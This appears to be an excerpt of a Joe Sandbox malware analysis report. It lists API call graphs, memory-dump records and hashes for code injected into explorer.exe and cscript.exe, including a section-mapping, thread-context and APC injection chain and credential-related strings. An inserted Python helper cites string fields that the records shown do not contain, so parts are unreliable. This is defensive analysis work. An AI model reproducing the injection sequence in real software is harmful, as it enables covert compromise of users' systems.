                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$l$l$t
                                                      • API String ID: 0-168566397
                                                      • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                      • Instruction ID: e91438fc192313ecd2e8296c8c3c8e5ac89f7cee7761e7dfc304a537c989a2b5
                                                      • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                      • Instruction Fuzzy Hash: BA217C71A24A0D9BDB48EFA8D0447EEBAF0FF18304F904A2ED449D3700DB759991CB84
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: auth$logi$pass$user
                                                      • API String ID: 0-2393853802
                                                      • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                      • Instruction ID: 49c43928471b0b7e6786770ad93fb65b0e888cad51b88dabaa5a021eaf6f7a4f
                                                      • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                      • Instruction Fuzzy Hash: 2721AC31624B0D8BCB55DF9998907EEB7F1EF88344F005A59E80AEB344D7B1D9158BC2
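The String ID fields in the records above are mostly 4-byte fragments ("kern", "el32", ".dll") with the occasional complete string ("urlmon.dll", "User-Agent: "), and the plugin lists them in sorted order, so the order in which the code pushes them onto the stack is lost. The Python below, added here as an editorial example and not part of the Joe Sandbox report, takes the nine String ID values from this section and tries every ordering of the fragments against a hand-supplied list of strings an analyst would expect (that list, the function names and the "at most one missing chunk" threshold for partial matches are assumptions, not something the report provides).

```python
import itertools

# Strings the analyst expects the fragments to spell out. This list is an
# assumption supplied by hand; the report itself carries no dictionary.
KNOWN_STRINGS = [
    "kernel32.dll", "user32.dll", "shell32.dll", "ole32.dll", "version.dll",
    "sspicli.dll", "urlmon.dll", "chrome_child.dll", "Sniff from:", "User-Agent: ",
]

# "String ID" fields copied from the records above (the backslash is escaped
# for the Python literal; the field itself is 4$\$dll$ion.$vers).
STRING_ID_FIELDS = [
    "2.dl$dll$l32.$ole3$shel",
    "4$\\$dll$ion.$vers",
    "32.d$cli.$dll$sspi$user",
    ".dll$el32$h$kern",
    "$Snif$f fr$om:",
    ".dll$chro$hild$me_c",
    "User-Agent: $nt: $on.d$urlmon.dll",
    ".$l$l$t",
    "auth$logi$pass$user",
]


def split_string_id(field):
    """Split a Joe Sandbox 'String ID' field on its '$' separator, dropping
    the empty element that a leading '$' produces."""
    return [f for f in field.split("$") if f]


def reassemble(fragments, known=KNOWN_STRINGS, max_parts=5):
    """Try every ordering of up to `max_parts` fragments and report which
    known strings they spell.

    Returns (full, partial): `full` holds exact matches, `partial` holds
    known strings for which the fragments cover all but at most one 4-byte
    chunk (the record simply did not list the remaining chunk)."""
    full, partial = set(), set()
    for n in range(1, min(len(fragments), max_parts) + 1):
        for perm in itertools.permutations(fragments, n):
            s = "".join(perm)
            for k in known:
                if s == k:
                    full.add(k)
                elif len(s) >= 5 and len(k) - len(s) <= 4 and k.startswith(s):
                    partial.add(k)
    return full, partial - full


def decode_all(fields=STRING_ID_FIELDS):
    """Map each String ID field to the (full, partial) strings it reassembles into."""
    return {f: reassemble(split_string_id(f)) for f in fields}


if __name__ == "__main__":
    for field, (full, partial) in decode_all().items():
        print(f"{field!r:40} full={sorted(full)} partial={sorted(partial)}")
```

Two of the fields only resolve partially: "2.dl$dll$l32.$ole3$shel" spells shell32.dll outright but only ole32.dl for the second name, and "32.d$cli.$dll$sspi$user" gives sspicli.dll but only user32.d, because the final "l"/"ll" chunk is not in the listed String ID. The last field ("auth", "logi", "pass", "user") is not a library name at all and stays unresolved against this dictionary; a regex such as `[a-z0-9_]+\.dll` instead of a dictionary would also accept junk orderings like "l32.dll", which is why the example matches against expected strings.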

                                                      Execution Graph

                                                      Execution Coverage:1.7%
                                                      Dynamic/Decrypted Code Coverage:6.8%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:621
                                                      Total number of Limit Nodes:68
execution_graph (node/edge data behind the interactive graph; the raw edge list is omitted here and is cut off in the source after node 114413. The nodes that carry API names are kept below, grouped by code region, with the call order the edges give.)

Region 4a4xxxx (entry 4a4cb84 -> 4a4a042 -> 4a4a06b): the injection chain
• 4a4a182: NtQueryInformationProcess
• 4a49de2: NtCreateSection NtMapViewOfSection NtClose (reached via 4a4a290)
• 4a4a2fc: NtSuspendThread (reached via 4a4a2db)
• 4a49bb2: NtCreateSection (4a49c66) -> NtMapViewOfSection (4a49cc1) -> NtClose (4a49dc5)
• 4a4a4a6: NtSetContextThread
• 4a4a51c: RtlQueueApcWow64Thread
• 4a4a552: NtResumeThread
• Order given by the edges: 4a4a042 -> 4a4a182 -> 4a4a1ba, then either 4a4a290 -> 4a49de2, or 4a4a2db -> 4a4a2fc -> 4a4a331 -> 4a49bb2 -> 4a4a412 -> 4a4a4a6 -> 4a4a4bd -> 4a4a51c -> 4a4a531 -> 4a4a552 (4a4a412 and 4a4a4bd can also skip straight to 4a4a531).

Region 27bxxxx/27cxxxx (entry 27cf08d -> 27cb9d0): loader, file and process helpers
• 27bae30, 27b9620, 27bad40, 27c9c90, 27c52c0, 27c4e40, 27ca460, 27caf00, 27caf60, 27ca320, 27ca2a0, 27cac30: LdrLoadDll
• 27bd6b0, 27c4640: LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk
• 27c4780: LdrLoadDll NtReadFile NtClose
• 27cbfd0: LdrLoadDll RtlAllocateHeap
• 27ccfd0: LdrLoadDll RtlAllocateHeap RtlFreeHeap
• 27ca37c: NtCreateFile (wrapper 27ca360)
• 27ca42c: NtReadFile (wrapper 27ca410)
• 27ca4ac: NtClose (wrapper 27ca490)
• 27ca55c: NtAllocateVirtualMemory (wrapper 27ca540)
• 27ca64c: RtlAllocateHeap (wrapper 27ca630)
• 27ca68c: RtlFreeHeap (wrapper 27ca670)
• 27ca7ef: LookupPrivilegeValueW (wrapper 27ca7d0)
• 27ca6ff: CreateProcessInternalW (wrapper 27ca6e0)
• 27bf540: LdrLoadDll CreateProcessInternalW LdrInitializeThunk
• 4bd2c1f, 4bd2c70, 4bd2df0, 4bd2ea0, 4bd35c0: LdrInitializeThunk
• Each 27caxxx wrapper above first passes through 27caf60 (LdrLoadDll) before the native call, i.e. the API is resolved on every use rather than imported.
• 27cad70 chains 38 consecutive calls to 27cac30 (LdrLoadDll) in a straight line (nodes 114126 to 114200): a bulk import-resolution routine.
• Collapsed nodes: 27cbf90 (2 API calls), 27cbdc0 (2 API calls), 27c4a40 (8 API calls), 27bc7a0 (18 API calls), 27bf070 (21 API calls), 27b8d00 (23 API calls)
27cbdc0 2 API calls 114412->114413 114414 27b8249 114412->114414 114413->114414 114414->114402 114415->114402 114417 27c4e40 LdrLoadDll 114416->114417 114418 27bf6df 114417->114418 114419 27bf6ed 114418->114419 114420 27bf6e6 SetErrorMode 114418->114420 114419->114346 114420->114419 114434 27bf490 114421->114434 114423 27c43b6 114423->114348 114425 27cbd40 2 API calls 114424->114425 114428 27b8ad5 114425->114428 114426 27b8cea 114426->114351 114428->114426 114453 27c9880 114428->114453 114430 27bf673 114429->114430 114501 27c9e90 114430->114501 114433->114358 114435 27bf4ad 114434->114435 114441 27c9fc0 114435->114441 114438 27bf4f5 114438->114423 114442 27caf60 LdrLoadDll 114441->114442 114443 27c9fdc 114442->114443 114444 27bf4ee 114443->114444 114451 4bd2f30 LdrInitializeThunk 114443->114451 114444->114438 114446 27ca010 114444->114446 114447 27caf60 LdrLoadDll 114446->114447 114448 27ca02c 114447->114448 114452 4bd2d10 LdrInitializeThunk 114448->114452 114449 27bf51e 114449->114423 114451->114444 114452->114449 114454 27cbf90 2 API calls 114453->114454 114455 27c9897 114454->114455 114474 27b9310 114455->114474 114457 27c98b2 114458 27c98d9 114457->114458 114459 27c98f0 114457->114459 114460 27cbdc0 2 API calls 114458->114460 114462 27cbd40 2 API calls 114459->114462 114461 27c98e6 114460->114461 114461->114426 114463 27c992a 114462->114463 114464 27cbd40 2 API calls 114463->114464 114465 27c9943 114464->114465 114471 27c9be4 114465->114471 114480 27cbd80 LdrLoadDll 114465->114480 114467 27c9bc9 114468 27c9bd0 114467->114468 114467->114471 114469 27cbdc0 2 API calls 114468->114469 114470 27c9bda 114469->114470 114470->114426 114472 27cbdc0 2 API calls 114471->114472 114473 27c9c39 114472->114473 114473->114426 114475 27b9335 114474->114475 114476 27bace0 LdrLoadDll 114475->114476 114477 27b9368 114476->114477 114479 27b938d 114477->114479 114481 27bcf10 114477->114481 114479->114457 114480->114467 114482 27bcf3c 114481->114482 114483 27ca1e0 LdrLoadDll 
114482->114483 114484 27bcf55 114483->114484 114485 27bcf5c 114484->114485 114492 27ca220 114484->114492 114485->114479 114489 27bcf97 114490 27ca490 2 API calls 114489->114490 114491 27bcfba 114490->114491 114491->114479 114493 27caf60 LdrLoadDll 114492->114493 114494 27ca23c 114493->114494 114500 4bd2ca0 LdrInitializeThunk 114494->114500 114495 27bcf7f 114495->114485 114497 27ca810 114495->114497 114498 27caf60 LdrLoadDll 114497->114498 114499 27ca82f 114498->114499 114499->114489 114500->114495 114502 27caf60 LdrLoadDll 114501->114502 114503 27c9eac 114502->114503 114506 4bd2dd0 LdrInitializeThunk 114503->114506 114504 27bf69e 114504->114358 114506->114504 114507 27c9080 114508 27cbd40 2 API calls 114507->114508 114510 27c90bb 114508->114510 114509 27c919c 114510->114509 114511 27bace0 LdrLoadDll 114510->114511 114512 27c90f1 114511->114512 114513 27c4e40 LdrLoadDll 114512->114513 114515 27c910d 114513->114515 114514 27c9120 Sleep 114514->114515 114515->114509 114515->114514 114518 27c8ca0 LdrLoadDll 114515->114518 114519 27c8eb0 LdrLoadDll 114515->114519 114518->114515 114519->114515 114520 4bd2ad0 LdrInitializeThunk

                                                      Control-flow Graph

                                                      APIs
                                                      • NtQueryInformationProcess.NTDLL ref: 04A4A19F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820657415.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4a40000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InformationProcessQuery
                                                      • String ID: 0
                                                      • API String ID: 1778838933-4108050209
                                                      • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                      • Instruction ID: c6c05a01714ed6c03220b2ac352138fe2b6d0ab16c588d50f6f77a7263ff1548
                                                      • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                      • Instruction Fuzzy Hash: 9BF11074518A4C8FDBA9EF68C894AEEB7E0FBD8304F50462AD44ED7251DF34A541CB41

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 209 4a49baf-4a49bfe call 4a49102 212 4a49c00 209->212 213 4a49c0c-4a49c9a call 4a4b942 * 2 NtCreateSection 209->213 214 4a49c02-4a49c0a 212->214 219 4a49ca0-4a49d0a call 4a4b942 NtMapViewOfSection 213->219 220 4a49d5a-4a49d68 213->220 214->213 214->214 223 4a49d52 219->223 224 4a49d0c-4a49d4c 219->224 223->220 226 4a49d4e-4a49d4f 224->226 227 4a49d69-4a49d6b 224->227 226->223 228 4a49d6d-4a49d72 227->228 229 4a49d88-4a49ddc call 4a4cd62 NtClose 227->229 230 4a49d74-4a49d86 call 4a49172 228->230 230->229
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820657415.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4a40000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Section$CloseCreateView
                                                      • String ID: @$@
                                                      • API String ID: 1133238012-149943524
                                                      • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                      • Instruction ID: bd983c58829b078fb5a88700ee256990739994cb1481d5c663285842136b051a
                                                      • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                      • Instruction Fuzzy Hash: 5B616170518B488FDB58DF68D8856AEBBE0FBD8314F50062EE58AC3651DB35E441CB86

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 268 4a49bb2-4a49bef 269 4a49bf7-4a49bfe 268->269 270 4a49bf2 call 4a49102 268->270 271 4a49c00 269->271 272 4a49c0c-4a49c9a call 4a4b942 * 2 NtCreateSection 269->272 270->269 273 4a49c02-4a49c0a 271->273 278 4a49ca0-4a49d0a call 4a4b942 NtMapViewOfSection 272->278 279 4a49d5a-4a49d68 272->279 273->272 273->273 282 4a49d52 278->282 283 4a49d0c-4a49d4c 278->283 282->279 285 4a49d4e-4a49d4f 283->285 286 4a49d69-4a49d6b 283->286 285->282 287 4a49d6d-4a49d72 286->287 288 4a49d88-4a49ddc call 4a4cd62 NtClose 286->288 289 4a49d74-4a49d86 call 4a49172 287->289 289->288
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820657415.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4a40000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Section$CreateView
                                                      • String ID: @$@
                                                      • API String ID: 1585966358-149943524
                                                      • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                      • Instruction ID: df1537e378213e408c4181d12441231bae3f9ceddc9b6a105968d0b1a9430ef3
                                                      • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                      • Instruction Fuzzy Hash: 095170B05187088FDB58DF68D8956AFBBE4FB88314F50062EE58AC3651DF35E441CB86

                                                      Control-flow Graph

                                                      APIs
                                                      • NtQueryInformationProcess.NTDLL ref: 04A4A19F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820657415.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4a40000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InformationProcessQuery
                                                      • String ID: 0
                                                      • API String ID: 1778838933-4108050209
                                                      • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                      • Instruction ID: 4ee1f356b4bbda3964de5555979f67977d316eb4208b7a29a2061f3b9ca46597
                                                      • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                      • Instruction Fuzzy Hash: FB511B70918A8C8FDBA9EF68C8946EEBBF4FB98305F40462ED44AD7251DF309645CB41

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 546 27ca360-27ca3b1 call 27caf60 NtCreateFile
                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,027C4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,027C4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 027CA3AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: .z`
                                                      • API String ID: 823142352-1441809116
                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction ID: 2ad25d307c67fbfdce50f5ff64ffd393fc383e5db7ebe09c23d7d4242d361fbb
                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction Fuzzy Hash: C7F0BDB2200208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                                      APIs
                                                      • NtReadFile.NTDLL(027C4D62,5EB65239,FFFFFFFF,027C4A21,?,?,027C4D62,?,027C4A21,FFFFFFFF,5EB65239,027C4D62,?,00000000), ref: 027CA455
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: cc261815be1b76bbf6ed8d0ec2f5f52c8170b3f1ba0c5c550c920ec06b4a661b
                                                      • Instruction ID: 1ca77a0e1ac96f63a74a4acb3ea3ed3bc3ecb6a464a3b91669384146523e536a
                                                      • Opcode Fuzzy Hash: cc261815be1b76bbf6ed8d0ec2f5f52c8170b3f1ba0c5c550c920ec06b4a661b
                                                      • Instruction Fuzzy Hash: 32F0C4B2200108AFCB14CF99CC85DEBB7A9EF8C354F118248BA1DA7244DA30E811CBA0
                                                      APIs
                                                      • NtReadFile.NTDLL(027C4D62,5EB65239,FFFFFFFF,027C4A21,?,?,027C4D62,?,027C4A21,FFFFFFFF,5EB65239,027C4D62,?,00000000), ref: 027CA455
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction ID: b6aa919d1b15d9f51eeaf56ba9eda6944537c59625fd853f857daf9db1af673c
                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction Fuzzy Hash: 17F0B7B2200208AFCB14DF99DC84EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,027B2D11,00002000,00003000,00000004), ref: 027CA579
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                      • Instruction ID: 0843c89205646a44e4f819aa44a0ce4bc647ac57b0e36079cdcb50dca84f4cb2
                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                      • Instruction Fuzzy Hash: 58F015B2200208ABCB14DF89CC80EAB77ADEF88754F118148BE0897241C630F810CBA0
                                                      APIs
                                                      • NtClose.NTDLL(027C4D40,?,?,027C4D40,00000000,FFFFFFFF), ref: 027CA4B5
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 1afca4c59a114cc017ac28b904ff86571fccce21da28450a8850a3a11c2b6b6e
                                                      • Instruction ID: 0b185f8c33e43acd46852a238f8b8641ba05135772e8ef436224a4028b7dc904
                                                      • Opcode Fuzzy Hash: 1afca4c59a114cc017ac28b904ff86571fccce21da28450a8850a3a11c2b6b6e
                                                      • Instruction Fuzzy Hash: 2CE08CB6240204ABE710EF94CC84EA77B68EB44710F208459BA585B241C630EA0087D0
                                                      APIs
                                                      • NtClose.NTDLL(027C4D40,?,?,027C4D40,00000000,FFFFFFFF), ref: 027CA4B5
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction ID: 03d5962372b8c88f1b8de69ae36a4cf9f391862f8a067bfd9125f2c33b144656
                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction Fuzzy Hash: 32D012762002186BD710EF98CC45E97775DEF44750F154459BA185B241C530F50086E0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3b0c7a00e9136beb1f379726de6127f48dc4d131df2f32ddca209df9cecdc39c
                                                      • Instruction ID: 24dfd854b1d47dee5fcec5bb9829309ce57904cbb2faaf38374f8b5a52e83e47
                                                      • Opcode Fuzzy Hash: 3b0c7a00e9136beb1f379726de6127f48dc4d131df2f32ddca209df9cecdc39c
                                                      • Instruction Fuzzy Hash: 7F90023220180402F100759954086560005CBE0305F55E051A5025656EC769D9927131
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d4581b3864eaac6f943b64f77c394923d37e2b5d4e52277870ef4f8a2c22614d
                                                      • Instruction ID: bace431588dedca7a6790826963360f40ca83c11edf2a528eb5121b3e80cf149
                                                      • Opcode Fuzzy Hash: d4581b3864eaac6f943b64f77c394923d37e2b5d4e52277870ef4f8a2c22614d
                                                      • Instruction Fuzzy Hash: 9890023220188802F1107159840475A0005CBD0305F59D451A4425759D8799D9927121
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 9aea074282211a01544e43a7b35b497a21a3c2a8e05be4fdecc1d43f0af79054
                                                      • Instruction ID: c621560d602fda867b196f7b89b2bc1470dd1a21ccce025b349f846b65745b2c
                                                      • Opcode Fuzzy Hash: 9aea074282211a01544e43a7b35b497a21a3c2a8e05be4fdecc1d43f0af79054
                                                      • Instruction Fuzzy Hash: E190023220180842F10071594404B560005CBE0305F55D056A0125755D8719D9527521
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d35c20357aef3050d152420a0342254f7ad647f4fc117ba9bf4a470aec3a297d
                                                      • Instruction ID: 155cadcdb3e84791afcc0b144f45141414e9f13a245d3f65683a7f7c7edb5cec
                                                      • Opcode Fuzzy Hash: d35c20357aef3050d152420a0342254f7ad647f4fc117ba9bf4a470aec3a297d
                                                      • Instruction Fuzzy Hash: 9390023220180413F111715945047170009CBD0245F95D452A0425659D975ADA53B121
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c41b9af25b98c58b09f999b44bd912f3b91af86ad4afbf604fcaf83848665c11
                                                      • Instruction ID: bffd333265f89fdb715c466db1f882ac24ef318a6a3da0b019deb01f7c887a52
                                                      • Opcode Fuzzy Hash: c41b9af25b98c58b09f999b44bd912f3b91af86ad4afbf604fcaf83848665c11
                                                      • Instruction Fuzzy Hash: 9D900222242841527545B15944045174006DBE0245795D052A1415A51C862AE957E621
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6fe5487f99fc3ee77fdbf40bdeeb0a60634c57d27599188d575781971d74f350
                                                      • Instruction ID: 166748229a3b8c12b60bea6b13829603b868b7bb9d55510ac29d1965f4b904d0
                                                      • Opcode Fuzzy Hash: 6fe5487f99fc3ee77fdbf40bdeeb0a60634c57d27599188d575781971d74f350
                                                      • Instruction Fuzzy Hash: AC90022A21380002F1807159540861A0005CBD1206F95E455A0016659CCA19D96A6321
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
